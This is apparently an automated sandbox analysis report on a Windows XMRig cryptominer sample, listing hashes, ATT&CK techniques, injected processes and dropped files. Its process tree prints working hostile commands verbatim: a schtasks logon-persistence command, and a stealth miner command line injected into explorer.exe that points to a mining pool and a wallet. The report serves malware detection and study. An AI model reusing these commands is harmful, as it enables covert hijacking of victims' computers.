xmrig | 58612c41719c153b5f066b69c22dfd826e395b055bfcdccc32637fb6cb1791e9

Analysis

max time kernel
193s
max time network
202s
platform
windows10-2004_x64
resource
win10v2004-20231215-en
resource tags

arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
submitted
26/12/2023, 12:33

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

6ed6386becd96891e15a4b71c1be56ec.exe
Size

2.6MB
MD5

6ed6386becd96891e15a4b71c1be56ec
SHA1

a467e9282a6a40793d84620dc109f575205fdd4d
SHA256

58612c41719c153b5f066b69c22dfd826e395b055bfcdccc32637fb6cb1791e9
SHA512

42e6b298a173589f70112ffcdc87fd99738e7acf580093741066c464f5c8be89583969ea0dd6817aba9865d2af33cdb0e45820d03101fc466fb802182d9b93c1
SSDEEP

49152:nQ2hnLrWU5N6f2qzsKjWeg+dO2vF4bG20r0e/Zebz9DMhIRrACqKidpM:njDsoKjWKdOGFs0r769wkULjM

Score

10^/10

xmrig miner

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 9 IoCs

miner

resource	yara_rule
behavioral2/memory/4760-56-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig
behavioral2/memory/4760-57-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig
behavioral2/memory/4760-59-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig
behavioral2/memory/4760-62-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig
behavioral2/memory/4760-64-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig
behavioral2/memory/4760-65-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig
behavioral2/memory/4760-67-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig
behavioral2/memory/4760-66-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig
behavioral2/memory/4760-68-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\Control Panel\International\Geo\Nation	6ed6386becd96891e15a4b71c1be56ec.exe
Key value queried	\REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\Control Panel\International\Geo\Nation	Services.exe

Executes dropped EXE 3 IoCs

pid	Process
2296	sihost64.exe
3264	Services.exe
3464	sihost64.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 3264 set thread context of 4760	3264	Services.exe	105

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
4936	schtasks.exe
4552	schtasks.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

pid	Process
4576	6ed6386becd96891e15a4b71c1be56ec.exe
4576	6ed6386becd96891e15a4b71c1be56ec.exe
3264	Services.exe
3264	Services.exe
3264	Services.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
660	Process not Found

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	4576	6ed6386becd96891e15a4b71c1be56ec.exe
Token: SeDebugPrivilege	3264	Services.exe
Token: SeLockMemoryPrivilege	4760	explorer.exe
Token: SeLockMemoryPrivilege	4760	explorer.exe

Suspicious use of WriteProcessMemory 29 IoCs

description	pid	Process	procid_target
PID 4576 wrote to memory of 4908	4576	6ed6386becd96891e15a4b71c1be56ec.exe	92
PID 4576 wrote to memory of 4908	4576	6ed6386becd96891e15a4b71c1be56ec.exe	92
PID 4908 wrote to memory of 4552	4908	cmd.exe	93
PID 4908 wrote to memory of 4552	4908	cmd.exe	93
PID 4576 wrote to memory of 2296	4576	6ed6386becd96891e15a4b71c1be56ec.exe	96
PID 4576 wrote to memory of 2296	4576	6ed6386becd96891e15a4b71c1be56ec.exe	96
PID 4576 wrote to memory of 3264	4576	6ed6386becd96891e15a4b71c1be56ec.exe	97
PID 4576 wrote to memory of 3264	4576	6ed6386becd96891e15a4b71c1be56ec.exe	97
PID 3264 wrote to memory of 2084	3264	Services.exe	99
PID 3264 wrote to memory of 2084	3264	Services.exe	99
PID 2084 wrote to memory of 4936	2084	cmd.exe	101
PID 2084 wrote to memory of 4936	2084	cmd.exe	101
PID 3264 wrote to memory of 3464	3264	Services.exe	104
PID 3264 wrote to memory of 3464	3264	Services.exe	104
PID 3264 wrote to memory of 4760	3264	Services.exe	105
PID 3264 wrote to memory of 4760	3264	Services.exe	105
PID 3264 wrote to memory of 4760	3264	Services.exe	105
PID 3264 wrote to memory of 4760	3264	Services.exe	105
PID 3264 wrote to memory of 4760	3264	Services.exe	105
PID 3264 wrote to memory of 4760	3264	Services.exe	105
PID 3264 wrote to memory of 4760	3264	Services.exe	105
PID 3264 wrote to memory of 4760	3264	Services.exe	105
PID 3264 wrote to memory of 4760	3264	Services.exe	105
PID 3264 wrote to memory of 4760	3264	Services.exe	105
PID 3264 wrote to memory of 4760	3264	Services.exe	105
PID 3264 wrote to memory of 4760	3264	Services.exe	105
PID 3264 wrote to memory of 4760	3264	Services.exe	105
PID 3264 wrote to memory of 4760	3264	Services.exe	105
PID 3264 wrote to memory of 4760	3264	Services.exe	105

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\6ed6386becd96891e15a4b71c1be56ec.exe
"C:\Users\Admin\AppData\Local\Temp\6ed6386becd96891e15a4b71c1be56ec.exe"
1⤵
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4576
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"' & exit
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4908
- - C:\Windows\system32\schtasks.exe
    schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"'
    3⤵
    - Creates scheduled task(s)
    PID:4552
- C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
  "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
  2⤵
  - Executes dropped EXE
  PID:2296
- C:\Users\Admin\AppData\Local\Temp\Services.exe
  "C:\Users\Admin\AppData\Local\Temp\Services.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3264
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"' & exit
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2084
  - - C:\Windows\system32\schtasks.exe
      schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"'
      4⤵
      Creates scheduled task(s)
      PID:4936
- - C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
    3⤵
    - Executes dropped EXE
    PID:3464
- - C:\Windows\explorer.exe
    C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmrpool.eu:3333 --user=49w7QckjcT4c2xnUq611cM3ZFqyQCb7fDihrJpYYZbX39vQqn1iz7Qw4LrcxfFNuyT5Jnp2fjPu2vChX6gxPGHxf6JLitTT --pass= --cpu-max-threads-hint=30 --donate-level=5 --cinit-idle-wait=5 --cinit-idle-cpu=90 --cinit-stealth
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4760

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Scheduled Task/Job

T1053

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Services.exe

Filesize
274KB

MD5
3346738615a89ebaa50c2207209a8c4b

SHA1
22db1986dae0879dc13af22414f124ce43f36f1b

SHA256
920c9768cc546c15c86469d03045801470b3763110a8174d647511e8b74dcf12

SHA512
3c98e13bb77134972e04c5046f124db77ad4746fb66997f3022975d5d21a15a78e39bae878bcbfa7f2633d6a8c17a93ff55317034386dfdd22d1615895f7c45c

Download Submit
C:\Users\Admin\AppData\Local\Temp\Services.exe

Filesize
896KB

MD5
74548a06c143d3bce4bb5a6146f855ca

SHA1
46068cc83c3af13980c36041ed56d5f6dae64c8e

SHA256
fce6a35846ad73e0cf7d345453be6050a46d4e745ea59694e160e07838cdea5a

SHA512
8695f99940c9298dbe6e55733fd0ee6a9b72b4a7e879771e8de4044c5038409b53068d27bd75fd7a309aed869659ee0c3dd595ee2e1cc815ec23dc61019a1e56

Download Submit
C:\Users\Admin\AppData\Local\Temp\Services.exe

Filesize
832KB

MD5
069864b9204df7446f2c8c7048286e40

SHA1
2d46928f684a615fa98e13ce32b6b8a0e51aefec

SHA256
50fe1622a9a0ec54f39b5f419c490f0d26284c8ad73838f3e287a9cc1e8355cd

SHA512
2d6b72b5024b8301a76c6f092195b40a0dbc0bce5e7c78c7b24b01ef456ed2726fcd447f2523bcc83b8a35f3349e9152bff765b819389befd37352529295a6a0

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\WR64.sys

Filesize
14KB

MD5
0c0195c48b6b8582fa6f6373032118da

SHA1
d25340ae8e92a6d29f599fef426a2bc1b5217299

SHA256
11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5

SHA512
ab28e99659f219fec553155a0810de90f0c5b07dc9b66bda86d7686499fb0ec5fddeb7cd7a3c5b77dccb5e865f2715c2d81f4d40df4431c92ac7860c7e01720d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

Filesize
11KB

MD5
eceb485ced36a2afec01f4c5d858bb14

SHA1
017f4e25c93bf01c5681eed6569d7e90350f8e9a

SHA256
7cb8f9ef34e8aa123fc4ca85e5848d1ffbc12e861af27e805bd0e717efee5f41

SHA512
d665c82a06e339ee636d272b6295f4d8a497040ff33560e92f303abfc9badeed92a401176f510be90f7f627a099896ced273a8ad2a6bc6505a7ee06f750ddecb

Download Submit
memory/2296-38-0x00007FFEA97A0000-0x00007FFEAA261000-memory.dmp

Filesize
10.8MB

Download
memory/2296-34-0x0000000002DD0000-0x0000000002DD6000-memory.dmp

Filesize
24KB

Download
memory/2296-21-0x0000000000460000-0x0000000000468000-memory.dmp

Filesize
32KB

Download
memory/2296-22-0x00007FFEA97A0000-0x00007FFEAA261000-memory.dmp

Filesize
10.8MB

Download
memory/2296-36-0x00007FFEA97A0000-0x00007FFEAA261000-memory.dmp

Filesize
10.8MB

Download
memory/2296-35-0x000000001C300000-0x000000001C310000-memory.dmp

Filesize
64KB

Download
memory/3264-54-0x000000001DC30000-0x000000001DC3E000-memory.dmp

Filesize
56KB

Download
memory/3264-39-0x00007FFEA97A0000-0x00007FFEAA261000-memory.dmp

Filesize
10.8MB

Download
memory/3264-33-0x00007FFEA97A0000-0x00007FFEAA261000-memory.dmp

Filesize
10.8MB

Download
memory/3264-61-0x00007FFEA97A0000-0x00007FFEAA261000-memory.dmp

Filesize
10.8MB

Download
memory/3264-37-0x000000001DC40000-0x000000001DC52000-memory.dmp

Filesize
72KB

Download
memory/3464-63-0x00007FFEA97A0000-0x00007FFEAA261000-memory.dmp

Filesize
10.8MB

Download
memory/3464-55-0x000000001C9E0000-0x000000001C9F0000-memory.dmp

Filesize
64KB

Download
memory/3464-53-0x00007FFEA97A0000-0x00007FFEAA261000-memory.dmp

Filesize
10.8MB

Download
memory/4576-0-0x00000000002A0000-0x0000000000548000-memory.dmp

Filesize
2.7MB

Download
memory/4576-3-0x000000001C4E0000-0x000000001C700000-memory.dmp

Filesize
2.1MB

Download
memory/4576-32-0x00007FFEA97A0000-0x00007FFEAA261000-memory.dmp

Filesize
10.8MB

Download
memory/4576-6-0x000000001C0D0000-0x000000001C0E0000-memory.dmp

Filesize
64KB

Download
memory/4576-4-0x00007FFEA97A0000-0x00007FFEAA261000-memory.dmp

Filesize
10.8MB

Download
memory/4576-1-0x00007FFEA97A0000-0x00007FFEAA261000-memory.dmp

Filesize
10.8MB

Download
memory/4576-2-0x000000001C0D0000-0x000000001C0E0000-memory.dmp

Filesize
64KB

Download
memory/4760-56-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/4760-60-0x0000000000E00000-0x0000000000E20000-memory.dmp

Filesize
128KB

Download
memory/4760-59-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/4760-62-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/4760-57-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/4760-64-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/4760-65-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/4760-67-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/4760-66-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/4760-68-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/4760-69-0x0000000002C30000-0x0000000002C70000-memory.dmp

Filesize
256KB

Download
memory/4760-70-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download